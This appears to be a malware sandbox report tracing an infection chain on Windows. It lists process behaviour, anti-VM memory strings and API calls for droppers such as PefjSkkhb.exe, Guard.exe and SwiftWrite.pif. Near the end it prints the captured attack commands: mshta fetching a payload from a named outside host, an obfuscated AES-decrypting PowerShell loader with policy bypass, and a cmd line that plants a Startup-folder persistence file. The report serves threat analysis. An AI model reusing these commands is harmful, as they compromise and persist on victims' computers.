Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2091
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5162
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4638
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4697
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5036
Source: C:\Windows\System32\mshta.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ghep2[1]
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_20-99541
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe API coverage: 3.7 %
Source: C:\Users\Public\Guard.exe API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif API coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep count: 2091 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep count: 1184 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6692Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4832Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep count: 7399 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep count: 2088 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00007FF7C0ECC7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,11_2_00007FF7C0EDA350
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,11_2_00007FF7C0EDA4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED6428 FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7C0ED6428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00007FF7C0EDA874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E92F50 FindFirstFileExW,11_2_00007FF7C0E92F50
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED71F4 FindFirstFileW,FindClose,11_2_00007FF7C0ED71F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00007FF7C0ED72A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00007FF7C0ECB7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00007FF7C0ECBC70
Source: C:\Users\Public\Guard.exeCode function: 20_2_00714005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00714005
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071494A GetFileAttributesW,FindFirstFileW,FindClose,20_2_0071494A
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_0071C2FF
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071CD14 FindFirstFileW,FindClose,20_2_0071CD14
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,20_2_0071CD9F
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0071F5D8
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0071F735
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_0071FA36
Source: C:\Users\Public\Guard.exeCode function: 20_2_00713CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00713CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_002F4005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F494A GetFileAttributesW,FindFirstFileW,FindClose,24_2_002F494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_002FC2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FCD14 FindFirstFileW,FindClose,24_2_002FCD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,24_2_002FCD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_002FF5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_002FF735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_002FFA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_002F3CE2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E71D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,11_2_00007FF7C0E71D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: wscript.exe, 00000017.00000003.2426956978.0000021B89090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: powershell.exe, 00000006.00000002.2256965321.000002701E33E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: mshta.exe, 00000004.00000003.2277213025.000001D0EC5A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280075784.000001D0EC5A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBni
Source: SwiftWrite.pif, 00000018.00000002.3293947279.0000000003F54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~K5
Source: powershell.exe, 00000006.00000002.2256965321.000002701E327000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6EW
Source: powershell.exe, 00000006.00000002.2256965321.000002701E33E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: powershell.exe, 00000012.00000002.2493771492.00000130F99BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW19%SystemRoot%\system32\mswsock.dllon1)
Source: powershell.exe, 00000012.00000002.2488483129.00000130F985C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\P
Source: Guard.exe, 00000014.00000002.3293628451.000000000382E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: mshta.exe, 00000004.00000002.2280293129.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3291656704.000001CFD802B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3291604933.000001CFD8013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3293466178.000001CFDD653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000017.00000003.2426956978.0000021B89090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000004.00000002.2280075784.000001D0EC573000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277213025.000001D0EC570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE0A00 BlockInput,11_2_00007FF7C0EE0A00
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E537B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00007FF7C0E537B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E75BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,11_2_00007FF7C0E75BC0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E56D64 LoadLibraryA,GetProcAddress,11_2_00007FF7C0E56D64
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E94318 GetProcessHeap,11_2_00007FF7C0E94318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E98FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7C0E98FE4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E8AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7C0E8AF58
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E757E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF7C0E757E4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E759C8 SetUnhandledExceptionFilter,11_2_00007FF7C0E759C8
Source: C:\Users\Public\Guard.exeCode function: 20_2_006DA354 SetUnhandledExceptionFilter,20_2_006DA354
Source: C:\Users\Public\Guard.exeCode function: 20_2_006DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_006DA385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002BA354 SetUnhandledExceptionFilter,24_2_002BA354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002BA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_002BA385

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBCE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00007FF7C0EBCE68
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E537B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00007FF7C0E537B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E74514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00007FF7C0E74514
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE2464 mouse_event,11_2_00007FF7C0EE2464
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean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uOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($rptyb){return -split ($rptyb -replace '..', '0x$& ')};$tmdjyn = clean('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');$muoqabmc = [system.security.cryptography.aes]::create();$muoqabmc.key = clean('756561544973656a645a7544464b6a70');$muoqabmc.iv = new-object byte[] 16;$laiujgbhf = $muoqabmc.createdecryptor();$mgnvsudwp = [text.encoding]::utf8.getstring($laiujgbhf.transformfinalblock
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBC5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00007FF7C0EBC5FC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBD540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00007FF7C0EBD540
Source: powershell.exe, 00000006.00000002.2202478685.00000270161B0000.00000004.00000800.00020000.00000000.sdmp, PefjSkkhb.exe, 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp, Guard.exe, 00000014.00000003.2314578379.00000000044BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PefjSkkhb.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E8FD20 cpuid 11_2_00007FF7C0E8FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
